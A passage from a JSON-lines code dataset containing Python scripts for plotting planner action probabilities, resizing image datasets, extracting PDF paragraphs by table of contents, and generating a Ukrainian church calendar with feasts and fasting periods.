epoch_indeces = extract_probabilities(log_lines, skip_x_probs)\n write_probability_graph(probabilities, epoch_indeces[1:], tex_path)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"LukasSchaefer/ASNets_FastDownward","sub_path":"evaluation/evaluation_data_scripts/act_probability_graph.py","file_name":"act_probability_graph.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9161692586","text":"import sys; sys.path.extend(['.'])\nimport os\nimport re\nimport shutil\nimport argparse\n\nfrom tqdm import tqdm\nfrom PIL import Image\nfrom joblib import Parallel, delayed\n\nfrom scripts.utils import tqdm_joblib, resize_and_save_image, file_ext\n\n#----------------------------------------------------------------------------\n\ndef resize_dataset(\n source_dir, target_dir: str=None, size: int=None, format: str=None, num_jobs: int=8, ignore_regex: str=None,\n ignore_ext: str=None, images_only: bool=False, fname_prefix: str='', rename_enum: bool=False, **resizing_kwargs):\n\n assert not size is None\n\n Image.init() # to load the extensions\n target_dir = f'{source_dir}_{size}' if target_dir is None else target_dir\n file_names = {os.path.relpath(os.path.join(root, fname), start=source_dir) for root, _dirs, files in os.walk(source_dir) for fname in files}\n\n if not ignore_ext is None:\n file_names = {f for f in file_names if not f.endswith(ignore_ext)}\n\n if not ignore_regex is None:\n file_names = {f for f in file_names if not re.fullmatch(ignore_regex, f)}\n\n jobs = []\n dirs_to_create = set()\n\n for i, file_name in tqdm(enumerate(file_names), desc=f'Collecting jobs'):\n src_path = os.path.join(source_dir, file_name)\n src_ext = file_ext(src_path)\n\n if src_ext in Image.EXTENSION:\n trg_file_basename = f'{i:08d}' if rename_enum else (fname_prefix + file_name[:file_name.rfind('.')])\n trg_path = os.path.join(target_dir, trg_file_basename + (src_ext if format is None else format))\n jobs.append(delayed(resize_and_save_image)(\n src_path=src_path,\n trg_path=trg_path,\n size=size,\n **resizing_kwargs,\n ))\n elif not images_only:\n assert not os.path.islink(src_path)\n trg_path = os.path.join(target_dir, file_name)\n print(f'Copying {src_path} => {trg_path} since it is not an image')\n jobs.append(delayed(shutil.copyfile)(src=src_path, dst=trg_path))\n else:\n trg_path = None\n\n if not trg_path is None:\n dirs_to_create.add(os.path.dirname(trg_path))\n\n for d in tqdm(dirs_to_create, desc='Creating necessary directories'):\n if d != '':\n os.makedirs(d, exist_ok=True)\n\n with tqdm_joblib(tqdm(desc=\"Executing jobs\", total=len(jobs))) as progress_bar:\n Parallel(n_jobs=num_jobs)(jobs)\n\n#----------------------------------------------------------------------------\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--source_dir', required=True, type=str, help='Source directory')\n parser.add_argument('-t', '--target_dir', required=False, type=str, default=None, help='Target directory (default: `{source_dir}_{size}`)')\n parser.add_argument('-s', '--size', required=True, type=int, help='Target size.')\n parser.add_argument('-f', '--format', type=str, default=None, help='In which format should we save? If none, then use the source file format.')\n parser.add_argument('-j', '--num_jobs', type=int, default=8, help='Number of jobs for parallel execution')\n parser.add_argument('--ignore_ext', type=str, default='.DS_Store', help='File extension to ignore.')\n parser.add_argument('--fname_prefix', type=str, default='', help='Add this prefix to each file name.')\n parser.add_argument('--images_only', action='store_true', help='Process images only?')\n parser.add_argument('--rename_enum', action='store_true', help='Should we rename each file name with a numeric id?')\n parser.add_argument('--ignore_grayscale', action='store_true', help='Should we ignore grayscale images?')\n parser.add_argument('--ignore_broken', action='store_true', help='Should we ignore images which we failed to process?')\n parser.add_argument('--ignore_existing', action='store_true', help='Should we ignore images which have been already saved?')\n args = parser.parse_args()\n\n resize_dataset(\n source_dir=args.source_dir,\n target_dir=args.target_dir,\n size=args.size,\n format=args.format,\n num_jobs=args.num_jobs,\n ignore_ext=args.ignore_ext,\n fname_prefix=args.fname_prefix,\n images_only=args.images_only,\n rename_enum=args.rename_enum,\n ignore_grayscale=args.ignore_grayscale,\n ignore_broken=args.ignore_broken,\n ignore_existing=args.ignore_existing,\n )\n\n#----------------------------------------------------------------------------\n","repo_name":"snap-research/3dgp","sub_path":"scripts/data_scripts/resize_dataset.py","file_name":"resize_dataset.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"72"} +{"seq_id":"29484612995","text":"import os\nimport re\nfrom typing import Dict, List, Optional, Tuple\n\nimport pandas as pd\nimport spacy\nfrom PyPDF2 import PdfReader\nfrom spacy.tokens import Doc, Token\n\n\ndef process_tokens(\n doc: pd.Series, nlp: spacy.language.Language, stop_words: List[str]\n) -> List[str]:\n \"\"\"Processes the tokens in a document. Removes stop words, punctuation and non-alphabetic tokens.\"\"\"\n spacy_text = nlp(doc)\n return [\n token\n for token in spacy_text\n if not any([token.is_stop, token.is_punct, token.lemma_.lower() in stop_words, not token.is_alpha])\n ]\n\ndef get_filtered_tokens(spacy_text: Doc, stop_words: List[str]) -> List[Token]:\n \"\"\"Processes the tokens in a document. Removes stop words, punctuation and non-alphabetic tokens.\"\"\"\n return [\n token\n for token in spacy_text\n if not any([token.is_stop, token.is_punct, token.lemma_.lower() in stop_words, not token.is_alpha])\n ]\n\n\ndef process_lemmas(doc: pd.Series) -> List[str]:\n \"\"\"Makes tokens lemma lower case.\"\"\"\n return [token.lemma_.lower() for token in doc]\n\n\ndef _multiply_ngrams(tokens: List[str]):\n \"\"\"Generator that yields tokens, one time for standard token, three times for ngram. Used to multiply ngrams.\"\"\"\n for token in tokens:\n if \" \" in token:\n yield token\n yield token\n yield token\n\n\ndef get_table_of_contents(path: str, toc: str = \"Table of Contents\") -> Tuple[str, int]:\n \"\"\"Returns the table of contents of a pdf file and the page number of the table of contents.\"\"\"\n file = open(path, \"rb\")\n fileReader = PdfReader(file)\n text = \"\"\n toc_page = 0\n while not toc in text:\n try:\n pageObj = fileReader.pages[toc_page]\n # pageObj = fileReader.getPage(toc_page)\n except:\n return \"\", -1\n text = pageObj.extract_text()\n toc_page += 1\n file.close()\n return text, toc_page\n\n\ndef get_paragraphs_df(\n toc: str, pages_shift: int, paragraphs_names: Dict[str, List[str]], end_paragraph: str\n) -> pd.DataFrame:\n \"\"\"Based on the table of contents, returns a dataframe with the paragraphs and the pages they start and end on.\n\n Args:\n toc (str): table of contents of the pdf file.\n pages_shift (int): number of pages to shift the page numbers.\n paragraphs_names (Dict[str, List[str]]): dictionary with the paragraphs names.\n end_paragraph (str): name of the last paragraph.\n\n Returns:\n pd.DataFrame: dataframe with the paragraphs and the pages they start and end on.\n\n \"\"\"\n lines = toc.split(\"\\n\")\n rows = {\"paragraph\": [], \"start_page\": [], \"end_page\": [], \"start_text\": [], \"end_text\": []}\n for key, paragraphs in paragraphs_names.items():\n for paragraph in paragraphs:\n paragaph_without_spaces = paragraph.replace(\" \", \"\")\n paragraph_line = [line.replace(\" \", \"\") for line in lines if paragaph_without_spaces in line.replace(\" \", \"\")]\n if len(paragraph_line) == 0:\n continue\n paragraph_line = paragraph_line[0]\n paragraph_line_without_spaces = paragraph_line.replace(\" \", \"\")\n paragaph_without_spaces = paragraph.replace(\" \", \"\")\n try:\n start_page = (\n int(\n re.sub(\n \"[^0-9]+\",\n \"\",\n paragraph_line[paragraph_line.find(paragraph) + len(paragraph):],\n )\n )\n + pages_shift\n )\n except Exception as e:\n continue\n if len(rows[\"start_page\"]) > 0:\n rows[\"end_page\"].append(start_page)\n rows[\"end_text\"].append(paragraph if start_page!=999 else None)\n if key != end_paragraph:\n rows[\"paragraph\"].append(key)\n rows[\"start_page\"].append(start_page)\n rows[\"start_text\"].append(paragraph)\n else:\n break\n if len({len(i) for i in rows.values()}) != 1:\n rows[\"end_page\"].append(999)\n rows[\"end_text\"].append(None)\n return pd.DataFrame(rows)\n\n\ndef read_pages_from_pdf(path: str, start_page: int, end_page: int) -> str:\n \"\"\"Reads the text from a pdf file from start_page to end_page.\"\"\"\n file = open(path, \"rb\")\n fileReader = PdfReader(file)\n text = \"\"\n count = start_page - 1\n while count < end_page:\n try:\n pageObj = fileReader.pages[count]\n count += 1\n text += pageObj.extract_text().replace(\"\\n\", \"\")\n except IndexError:\n break\n return text\n\n\ndef read_paragraphs(\n df: pd.DataFrame,\n id_column: str,\n path: str,\n id: str,\n root: str = \"\"\n) -> pd.DataFrame:\n \"\"\"Reads paragraphs from a pdf file and saves them as txt files.\"\"\"\n result_dict = {\"paragraph\": [], id_column: [], \"text_path\": []}\n for i, row in df.iterrows():\n file_name = row.paragraph.replace(\":\",\"\").replace(\" \",\"_\").replace(\n \",\",\"\").replace(\"/\",\"_\").replace(\"(\",\"\").replace(\")\",\"\").replace(\n \"&\",\"\").replace(\"-\",\"_\").replace(\"__\",\"_\").lower()\n txt_destination = f\"{root}{id}_{file_name}.txt\"\n if row.start_page is None:\n text = \"\"\n else:\n start_page = row.start_page\n end_page = row.end_page\n for i in [0, -1, 1, 2]:\n start_page = row.start_page + i\n text = read_pages_from_pdf(path, start_page, end_page)\n if text != \"\":\n break\n if row.start_text is not None:\n try:\n text = row.start_text + text.split(row.start_text, 1)[1]\n except:\n pass\n if row.end_text is not None:\n text = text.split(row.end_text, 1)[0]\n text = text_cleaning(text)\n text_file = open(txt_destination, \"w+\", encoding=\"utf-8\")\n n = text_file.write(text)\n text_file.close()\n result_dict[\"paragraph\"].append(row.paragraph)\n result_dict[id_column].append(id)\n result_dict[\"text_path\"].append(txt_destination)\n return pd.DataFrame(result_dict)\n\n\ndef process_all_documents(\n directory_path: str,\n id_column: str,\n paragraphs_names: Dict[str, List[str]],\n save_txt: str,\n end_paragraph: str,\n toc_str: str = \"Table of Contents\",\n pages_shift: Optional[int] = None,\n) -> pd.DataFrame:\n \"\"\"Process documents from directory_path with\n table of contents with paragraph names and pages\n\n Args:\n directory_path (str): directory with documents to process\n id_column (str): name of the id column\n paragraphs_names (Dict[str, List[str]]): key - name of pargraph that should\n be displayed in the final df, value - list of possible names of this paragraph in toc\n save_txt (str): path to directory where txt files should be saved\n end_paragraph (str): last paragraph of the text that should not be present in final df\n toc_str (str, optional): name of table of contents in documents. Defaults to \"Table of Contents\".\n pages_shift (int, optional): difference between page number in table of contents and in pdf file.\n Defaults to None which will be interpreted as pages_shift = page of toc\n\n Returns:\n pd.DataFrame: data frame with desired format\n \"\"\"\n dir_list = os.listdir(directory_path)\n dir_list = [file for file in dir_list if file[-3:] == \"pdf\"]\n df = pd.DataFrame({\"paragraph\": [], id_column: [], \"text_path\": []})\n for doc in dir_list:\n toc, toc_page = get_table_of_contents(directory_path + doc, toc_str)\n paragraphs_df = get_paragraphs_df(\n toc, pages_shift or toc_page, paragraphs_names, end_paragraph\n )\n doc_df = read_paragraphs(paragraphs_df, id_column, directory_path + \"/\" + doc, doc[:-4], save_txt)\n df = pd.concat([df, doc_df], ignore_index=True)\n return df\n\n\ndef text_cleaning(text):\n # deleting URLs\n text = re.sub(r'\\w+:\\/{2}[\\d\\w-]+(\\.[\\d\\w-]+)*(?:(?:\\/[^\\s/]*))*', '', text, flags=re.MULTILINE)\n # deleting headlines\n text = re.sub(r'((\\d\\.)+\\d) +[A-Z]([a-z]|\\s|,)+', '', text)\n # deleting random numbers\n text = re.sub(r'((\\d)+ +)+\\(\\d+\\)', '', text)\n # deleting picture descriptions\n text = re.sub(r' \\d+ [A-Z](\\w|\\s|,)+.', '', text)\n # deleting tables\n sentences = text.split('. ')\n to_delete = False\n sentences_copy = sentences.copy()\n for i, sentence in enumerate(sentences):\n if to_delete:\n to_delete = False\n sentences_copy[i] = ''\n if re.match(r'\\s+Table \\d+', sentence):\n to_delete = True\n sentences_copy[i] = ''\n text = '. '.join(sentences_copy)\n # deleting multiple spaces\n text = re.sub(r'\\s{2,}', ' ', text)\n text = re.sub(r' . ', '', text)\n return text\n","repo_name":"MI2DataLab/HADES","sub_path":"hades/data_loading/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"34743872348","text":"# coding=utf-8\nimport re,codecs,datetime,os, sys\nimport locale\nfrom datetime import date, timedelta\nimport calendar\nimport json\n\nlocale.setlocale(locale.LC_TIME, \"uk_UA\")\n\neaster_date_str = sys.argv[1] # YYYY-MM-DD\neaster_date = datetime.datetime(*[int(item) for item in easter_date_str.split('-')]).date()\n\nyear = easter_date.year\n\nfixed_dates = {} # is loaded from the file\n\nmonth_sizes = [31, 29 if calendar.isleap(year) else 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\nentry_types = {\"місяця\":-1,\"січня\":1,\"лютого\":2,\"березня\":3,\"квітня\":4,\"травня\":5,\"червня\":6,\"липня\":7,\"серпня\":8,\"вересня\":9,\"жовтня\":10,\"листопада\":11,\"грудня\":12}\n\nweek_days = {\"понеділок\":0,\"вівторок\":1,\"середа\":2,\"четвер\":3,\"пт\":4,\"субота\":5,\"неділя\":6}\n\nweek_days_short = {0 : \"П\", 1: \"В\",2:\"С\" ,3:\"Ч\" ,4:\"П\", 5:\"С\", 6:\"Н\"}\nmonth_names = [\"Січень\", \"Лютий\", \"Березень\", \"Квітень\", \"Травень\", \"Червень\", \"Липень\", \"Серпень\", \"Вересень\", \"Жовтень\", \"Листопад\", \"Грудень\"];\n\ntokens_to_months = {'{{january}}': 0, '{{february}}':1,'{{march}}':2,'{{april}}':3,'{{may}}':4,'{{june}}':5,'{{july}}':6,'{{august}}':7,'{{september}}':8,'{{october}}':9,'{{november}}':10,'{{december}}':11}\nlongFastingsToken = \"{{long-fastings}}\"\noneDayFastingsToken = \"{{one-day-fastings}}\"\nfastingFreeTimesToken = \"{{fasting-free-times}}\"\nforbiddenTimesToken = \"{{forbidden-times}}\"\n\ndays = []\nentry_by_date = {}\ndate_by_label = {}\nconditions = []\n\noneDayFastings = []\nlongFastings = []\nforbiddenTimes = []\nfastFreeTimes = []\n\nnestedEntryRegex = re.compile(\"\\{(.*)\\}\")\nfixedDateRegex = re.compile(\"^([0-9]{1,2}) (січня|лютого|березня|квітня|травня|червня|липня|серпня|вересня|жовтня|листопада|грудня)$\", re.U)\n#labelRegex = re.compile(\"^([абвгґдеєжзиіїйклмнопрстуфхцчшщьюяАБВГҐДЕЄЖЗИІЇЙКЛМНОПРСТУФХЦЧШЩЬЮЯ]+).*:$\", re.U)\nlabelRegex = re.compile(\"^(.+):$\")\nconditionRegex = re.compile(\"(.+),(.+):(.+)\")\ndef readLine(_file):\n\twhile True:\n\t\tline = _file.readline()\n\t\tif not line:\n\t\t\tbreak\n\t\tif (line.startswith(\"#\") or 3 > len(line)): # comment or empty string\n\t\t\tcontinue\n\t\telse:\n\t\t\tline = line.strip()\n\t\t\tbreak\n\n\treturn line\n\ndef readLineEvenIfEmpty(_file):\n\twhile True:\n\t\tline = _file.readline()\n\t\tif not line:\n\t\t\tbreak\n\t\tif line.startswith(\"#\"): # comment or empty string\n\t\t\tcontinue\n\t\telse:\n\t\t\tline = line.strip()\n\t\t\tbreak\n\n\treturn line\n\ndef readFile(fileName, entryType):\n\tfile = open(fileName,\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\n\t\tif not line1:\n\t\t\tbreak\n\n\t\tlabelMatcher = labelRegex.match(line1);\n\t\tlabel = None\n\t\n\t\tif (labelMatcher):\n\t\t\tlabel = labelMatcher.group(1)\n\t\t\tentryValue = readLine(file)\n\t\telse:\n\t\t\tentryValue = line1\n\t\n\t\tline2 = readLine(file)\n\t\t\n\t\tentry = buildEntryFromLine(line2)\n\t\tentry.value = entryValue\n\t\tentry.value_type = entryType\n\t\tif label:\n\t\t\tentry.label = label\n\t\tfor d in entry.dates:\n\t\t\tif d.year == year:\n\t\t\t\tentry_by_date[d].append(entry)\n\t\t\tif label:\n\t\t\t\tdate_by_label[label] = d\n\ndef readSaints():\n\tprint(\"Read saints\")\n\treadFile(\"new-style/saints.txt\", \"saint\")\n\ndef readCelebr():\n\tprint(\"Read celebr\")\n\treadFile(\"new-style/celebr.txt\", \"sundays\")\n\t\ndef readAdditional():\n\tprint(\"Read additional\")\n\treadFile(\"new-style/add.txt\", \"additional\")\n\ndef readConditions():\n\tfile = open(\"new-style/conditions\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tif not line1:\n\t\t\tbreak\n\t\tmatcher = conditionRegex.match(line1)\n\t\tif ( None == matcher):\n\t\t\tprint(\"Failed to parse condition line: \" + line1)\n\t\t\tcontinue\n\t\tcondition = Condition()\n\t\tcondition.entry1 = matcher.group(1).strip()\n\t\tcondition.entry2 = matcher.group(2).strip()\n\t\tcondition.entryToLeave = matcher.group(3).strip()\n\t\tconditions.append(condition)\n\ndef readFastings():\n\tfile = open(\"new-style/fastings.txt\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tif not line1:\n\t\t\tbreak\n\t\tdateRange = DateRange()\n\t\tdateRange.title = line1\n\t\tline2 = readLineEvenIfEmpty(file)\n\t\tif not line2:\n\t\t\tlongFastings.append(dateRange)\n\t\telse:\n\t\t\tstartDateEntry = buildEntryFromLine(line2)\n\t\t\tdateRange.startDate = startDateEntry.dates[0]\n\t\t\tline3 = readLineEvenIfEmpty(file)\n\t\t\tif not line3:\n\t\t\t\toneDayFastings.append(dateRange)\n\t\t\telse:\n\t\t\t\tendDateEntry = buildEntryFromLine(line3)\n\t\t\t\tdateRange.endDate = endDateEntry.dates[0]\n\t\t\t\tlongFastings.append(dateRange)\n\tfile.close()\n\ndef readForbiddenTimes():\n\tfile = open(\"new-style/forbidden-times.txt\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tif not line1:\n\t\t\tbreak\n\t\tdateRange = DateRange()\n\t\tdateRange.title = line1\n\t\tforbiddenTimes.append(dateRange)\n\t\t\n\t\tline2 = readLineEvenIfEmpty(file)\n\t\tif line2:\n\t\t\tstartDateEntry = buildEntryFromLine(line2)\n\t\t\tdateRange.startDate = startDateEntry.dates[0]\n\t\t\tline3 = readLineEvenIfEmpty(file)\n\t\t\tif line3:\n\t\t\t\tendDateEntry = buildEntryFromLine(line3)\n\t\t\t\tdateRange.endDate = endDateEntry.dates[0]\n\tfile.close()\n\ndef readFastFreeTimes():\n\tfile = open(\"new-style/fast-free.txt\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tline2 = readLine(file)\n\n\t\tif not line1:\n\t\t\tbreak\n\t\tdateRange = DateRange()\n\t\tfastFreeTimes.append(dateRange)\n\n\t\tdateRange.startDate = buildEntryFromLine(line1).dates[0]\n\t\tdateRange.endDate = buildEntryFromLine(line2).dates[0]\n\tfile.close()\n\ndef buildEntryFromLine(line):\n\tentry = Entry()\n\tentry.raw_value = line\n\tentry_tokens = line.split(\" \")\n\tfixedDateMatcher = fixedDateRegex.match(line)\n\tif ( None != fixedDateMatcher):\n\t\td = date(year, int(entry_types[fixedDateMatcher.group(2)]), int(fixedDateMatcher.group(1)))\n\t\tentry.dates.append(d)\n\telse:\n\t\tdistance = entry_tokens[0]\n\t\tweekday = entry_tokens[1]\n\n\t\tif (\"перед\" == entry_tokens[2]):\n\t\t\tdistance = \"-\" + distance\n\t\t\tstartpoint = ' '.join(entry_tokens[3:])\n\t\telif (\"після\" == entry_tokens[2]):\n\t\t\tdistance = \"+\" + distance\n\t\t\tstartpoint = ' '.join(entry_tokens[3:])\n\t\telse:\n\t\t\tassert entry_tokens[2] in entry_types\n\t\t\tstartpoint = entry_tokens[2]\n\t\tnestedEntryMatcher = nestedEntryRegex.match(startpoint)\n\t\tif None != nestedEntryMatcher:\n\t\t\tnestedEntryString = nestedEntryMatcher.group(1)\n\t\t\tstartpointEntry = buildEntryFromLine(nestedEntryString)\n\t\t\tfor startPointDate in startpointEntry.dates:\n\t\t\t\td = calculateDateFromFixedDate(startPointDate, weekday, distance)\n\t\t\t\tentry.dates.append(d)\n\t\telif startpoint in fixed_dates:\n\t\t\td = calculateDateFromFixedDate(fixed_dates[startpoint], weekday, distance)\n\t\t\tentry.dates.append(d)\n\t\telif entry_types[startpoint] == -1:\n\t\t\tmonths = range(1,13)\n\t\t\tfor month in months:\n\t\t\t\td = calculateDateByEntry(month, weekday, distance)\n\t\t\t\tentry.dates.append(d)\n\t\telse:\n\t\t\td = calculateDateByEntry(entry_types[startpoint], weekday, distance)\n\t\t\tentry.dates.append(d)\n\n\treturn entry\n\n\n\nclass Condition:\n\tdef isValid():\n\t\treturn True\nclass Entry:\n\tvalue = \"\" # string which we should append \n\tvalue_type = \"\" # red yellow\n\tdates = []\n\traw_value = \"\"\n\tlabel = \"\"\n\tdef __init__(self):\n\t\tself.dates = []\n\tdef __repr__(self):\n\t\treturn \"Entry[raw_value=\"+ self.raw_value +\", value=\"+self.value +\", value_type=\"+self.value_type +\", label=\" + self.label + \"]\" \n\ndef calculateDateFromFixedDate(startdate, weekday, distance):\n\tweekday = week_days[weekday]\n\tif distance.startswith(\"-\"):\n\t\treturn startdate+timedelta(days=(1+weekday + 6-startdate.weekday())%7, weeks=(int(distance)) )\n\telif distance.startswith(\"+\"):\n\t\treturn startdate+timedelta(days=-((7-weekday+ startdate.weekday())%7), weeks=(int(distance)) )\n\telse:\n\t\treturn None\n\t\t\n# month - 1..12 \n# weekday - string\n# number - first, last, 2nd, 3rd...\ndef calculateDateByEntry(month, weekday, number): \n\tweekday = week_days[weekday]\n\t\n\tif \"остання\" == number:\n\t\tdays = range(month_sizes[month-1], 0, -1)\n\t\tcount = 1\n\telif \"передостання\" == number:\n\t\tdays = range(month_sizes[month-1], 0, -1)\n\t\tcount = 2\n\telse:\n\t\tdays = range(1,month_sizes[month-1]+1)\n\t\tcount = int(number)\n\t\t\n\tfor day in days:\n\t\tday_date = date(year,month,day)\n\t\tif weekday == day_date.weekday():\n\t\t\tcount-=1\n\t\t\tif 0 == count:\n\t\t\t\treturn day_date\n\treturn None\n\nclass DateRange:\n\tstartDate = None\n\tendDate = None\n\ttitle = \"\"\n\tdef __repr__(self):\n\t\treturn title\n\n\nclass CalendarDate:\n\tdate = None\n\tsaint = \"\"\n\tcelebr = \"\"\n\tadditional = \"\"\n\tdef applyEntry(self, entry):\n\t\tif self.date in entry.dates:\n\t\t\tif \"sundays\" == entry.value_type:\n\t\t\t\tif self.celebr.endswith(\" \"):\n\t\t\t\t\tself.celebr = self.celebr + entry.value\n\t\t\t\telse:\n\t\t\t\t\tself.celebr = self.celebr +\" \"+ entry.value\n\t\t\t\tself.celebr = self.celebr.strip()\n\t\t\telif \"saint\" == entry.value_type:\n\t\t\t\tif self.saint.endswith(\" \"):\n\t\t\t\t\tself.saint = self.saint + entry.value\n\t\t\t\telse:\n\t\t\t\t\tself.saint = self.saint + \" \" + entry.value\n\t\t\t\tself.saint = self.saint.strip()\n\t\t\telif \"additional\" == entry.value_type:\n\t\t\t\tif self.additional.endswith(\" \"):\n\t\t\t\t\tself.additional = self.additional + entry.value\n\t\t\t\telse:\n\t\t\t\t\tself.additional = self.additional + \" \"+ entry.value\n\t\t\t\tself.additional = self.additional.strip()\n\ndef datetime_parser(dct):\n\tregex = re.compile(\"^([0-9]{2})/([0-9]{2})$\")\n\tfor k, v in dct.items():\n\t\tmatcher = regex.match(v) # date matcher\n\t\tif isinstance(v, str) and None != matcher:\n\t\t\ttry:\n\t\t\t\tdct[k] = date(year, int(matcher.group(1)), int(matcher.group(2)))\n\t\t\texcept:\n\t\t\t\tpass\n\treturn dct\n\ndef initCalendar():\n\tglobal fixed_dates\n\n\twith open(\"new-style/fixed_dates.json\") as file:\n\t\tfixed_dates = json.loads(file.read(), object_hook=datetime_parser)\n\tfixed_dates[\"Пасха\"] = easter_date\n\n\tmonths = range(12)\n\tfor month in months:\n\t\tm_days = range(month_sizes[month])\n\t\tfor day in m_days:\n\t\t\tcal_date = CalendarDate()\n\t\t\td = date(year, month+1, day +1)\n\t\t\tcal_date.date = d\n\t\t\tdays.append(cal_date)\n\t\t\tentry_by_date[d] = [] #{\"saint\" : [], \"sundays\": [], \"additional\": []}\n\n\tprint(year)\n\tprint(len(days))\n\n\n\ndef filterEntries():\n\tfor c in conditions:\n\t\tif c.entry2 == '*':\n\t\t\td = date_by_label[c.entry1]\n\t\t\tfor entry in list(entry_by_date[d]):\n\t\t\t\tif entry.label != c.entryToLeave:\n\t\t\t\t\tentry_by_date[d].remove(entry)\n\t\t\tcontinue\n\t\tif date_by_label[c.entry1] == date_by_label[c.entry2]:\n\t\t\td = date_by_label[c.entry1]\n\t\t\tfor entry in list(entry_by_date[d]):\n\t\t\t\tif entry.label in [c.entry1, c.entry2]:\n\t\t\t\t\tif entry.label != c.entryToLeave:\n\t\t\t\t\t\tentry_by_date[d].remove(entry)\n\ndef applyEntries():\n\tprint(\"Applying celebrations...\")\n\tfor day in days:\n\t\tfor entry in entry_by_date[day.date]:\n\t\t\tday.applyEntry(entry)\n\ndef cleanup():\n\tfor day in days:\n\t\tif (day.date == fixed_dates[\"Різдво\"]): # Christmas so removing everything else\n\t\t\tday.additional = \"\"\n\t\tif (\" (на неділю).\" in day.additional):\n\t\t\tif (day.date.weekday() == 6 ): # sunday\n\t\t\t\tday.additional = day.additional.replace(\" (на неділю).\", \".\")\n\t\tif day.date == fixed_dates[\"Пасха\"]:\n\t\t\tday.additional = \"\"\n\t\t\tday.saint = \"\"\n\ndef writeCalendar():\n\tdir = str(year)\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\t\n\ttotal_days_written = 0\n\tmonths = range(1,13)\n\n\tfor month in months:\n\t\tmonth_file = codecs.open(dir + \"/\" + str(month) + \".ndm\", \"w\", \"utf-8-sig\")\n\t\tmonth_file.write('\\n') #codecs.BOM_UTF8 + '\\n')\n\t\tmonth_days_written = 0\n\t\twhile month_days_written < month_sizes[month-1]:\n\t\t\tday = days[total_days_written + month_days_written]\n\t\t\tmonth_file.write(str(day.date.day) + \"\\n\")\n\t\t\tmonth_file.write(day.celebr + \"\\n\")\n\t\t\tmonth_file.write(day.saint + \"\\n\")\n\t\t\tmonth_file.write(day.additional + \"\\n\")\n\t\t\tmonth_file.write(\"0\" + \"\\n\")\n\t\t\tmonth_file.write(\"\\n\")\n\t\t\tmonth_days_written+=1\n\t\ttotal_days_written+=month_days_written\n\t\tmonth_file.close()\n\tprint (len(days))\n\tprint(\"Writing calendar to an output file. Done...\")\n\ndef dateNmonth(date):\n\treturn date.strftime(\"%-d %B\")\n\ndef writeHtml():\n\tmonths = range(0,12)\n\ttotal_days_written = 0\n\t\n\twith open('html/template.html', 'r') as template, open('html/'+ str(year) + \".html\", 'w') as out:\n\t\tfor line in template:\n\t\t\tif line.strip() in tokens_to_months:\n\t\t\t\tmonth = tokens_to_months[line.strip()]\n\t\t\t\tmonth_days_written = 0\n\t\t\t\tout.write(\"<table class=\\\"table table-borderless\\\"><tbody>\")\n\t\t\t\twhile month_days_written < month_sizes[month]:\n\t\t\t\t\tday = days[total_days_written + month_days_written]\n\t\t\t\t\t\n\t\t\t\t\tisCelebr = day.celebr != '' or day.date.weekday() == 6 # sunday\n\t\t\t\t\tisSaint = day.saint != ''\n\t\t\t\t\tout.write(\"<tr class=\\\"month-row \"+ (\"celebr\" if isCelebr else '')+\"\\\">\\n\")\n\t\t\t\t\tout.write(\"<td class=\\\"text-right\\\">\\n\")\n\t\t\t\t\tout.write( str(day.date.day) + \"</td>\\n\")\n\t\t\t\t\tout.write(\"<td>\" + week_days_short[day.date.weekday()] + \"</td>\\n<td>\")\n\t\t\t\t\tif day.celebr != '':\n\t\t\t\t\t\tout.write(\"<span class=\\\" celebr\\\">\" + day.celebr + \"</span>\\n\")\n\t\t\t\t\tif isSaint:\n\t\t\t\t\t\tout.write(\"<span class=\\\" saint\\\">\" + day.saint + \"</span>\\n\")\n\t\t\t\t\tout.write(\"<span class=\\\" additional\\\">\" + day.additional + \"</span></td>\\n\")\n\t\t\t\t\tout.write(\"</tr>\\n\")\n\t\t\t\t\t\n\t\t\t\t\tmonth_days_written+=1\n\t\t\t\ttotal_days_written+=month_days_written\n\t\t\t\tout.write(\"</tbody></table>\")\n\t\t\telif line.strip() == longFastingsToken:\n\t\t\t\tfor f in longFastings:\n\t\t\t\t\tout.write(f.title)\n\t\t\t\t\tif (f.startDate):\n\t\t\t\t\t\tout.write(\" з <span class=\\\"celebration\\\">\" + dateNmonth(f.startDate))\n\t\t\t\t\t\tif(f.endDate):\n\t\t\t\t\t\t\tout.write(\"</span> по <span class=\\\"celebration\\\">\" + dateNmonth(f.endDate) +\"</span><br>\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.write(\"</span><br>\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tout.write(\"<br>\")\n\t\t\telif line.strip() == oneDayFastingsToken:\n\t\t\t\tfor f in oneDayFastings:\n\t\t\t\t\tout.write(\"<span class=\\\"celebration\\\">\" +dateNmonth(f.startDate) + \"</span> - \" + f.title + \"<br>\")\n\t\t\telif line.strip() == forbiddenTimesToken:\n\t\t\t\tfor f in forbiddenTimes:\n\t\t\t\t\tout.write(f.title)\n\t\t\t\t\tif (f.startDate):\n\t\t\t\t\t\tout.write(\" - <span class=\\\"celebration\\\">\" + dateNmonth(f.startDate))\n\t\t\t\t\t\tif(f.endDate):\n\t\t\t\t\t\t\tout.write(\" - \" + dateNmonth(f.endDate) +\"</span><br>\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.write(\"</span><br>\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tout.write(\"<br>\")\n\t\t\telif line.strip() == fastingFreeTimesToken:\n\t\t\t\tfor f in fastFreeTimes:\n\t\t\t\t\tout.write(\"з <span class=\\\"celebration\\\">\" + dateNmonth(f.startDate) + \"</span> по <span class=\\\"celebration\\\">\" + 